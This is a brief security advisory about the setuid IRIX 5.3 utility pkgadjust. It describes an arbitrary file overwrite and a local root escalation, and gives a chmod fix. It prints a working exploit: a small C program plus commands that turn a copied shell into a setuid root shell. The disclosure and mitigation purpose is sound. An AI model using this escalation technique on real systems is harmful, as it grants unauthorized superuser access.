COMMAND

    /usr/pkg/bin/pkgadjust

SYSTEMS AFFECTED

    SGI IRIX 5.3. IRIX 5.2 is not affected; unsure about IRIX 6.

PROBLEM

    PROBLEM 1.  pkgadjust will  allow any  user to  overwrite any file
    because it allows one to set via command line:

         -o    write debugging output to <file> rather than to stderr

    Since  pkgadjust  does  not  check  for  ownership, etc. this will
    destroy  the  file,  leading  to  a  denial  of service/removal of
    authorization checks.

    PROBLEM 2. pkgadjust will allow any user to gain superuser access.
    One can set programs to  list installed packages via command  line
    options.

                  -a <cmd> normally 'versions long' command line
                  -b <cmd> normally 'versions -v' command line

    This is trivially exploited:

    % cat > getroot.c
    int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
    % cc getroot.c -o getroot
    % cp /bin/sh sh
    % ls -la sh
    -rwxr-xr-x    1 hhui     user      140784 Jan  5 20:52 sh
    % /usr/pkg/bin/pkgadjust -f -a getroot
    scanning inst-database

    updating pkginfo-files
    ........................................^C
    % ls -la sh
    -rwsr-xr-x    1 root     sys       140784 Jan  5 20:52 sh

SOLUTION

    # chmod 700 /usr/pkg/bin/pkgadjust

    DISCUSSION. No sermons  here, but I  really doubt the  program was
    written for setuid. Since most  users can't write to the  lockfile
    in /var/sadm,  many pkg*  commands are  unavailable. I  also found
    these files improperly  permissioned and would  recommend removing
    setuid:

    -rwsr-xr-x    1 root     sys          838 Sep 27 11:27 /usr/lib/X11/
                                                           app-defaults/ISDN
    -rws--x--x    1 root     sys        18632 Sep 27 10:59 /usr/pkg/bin/abspath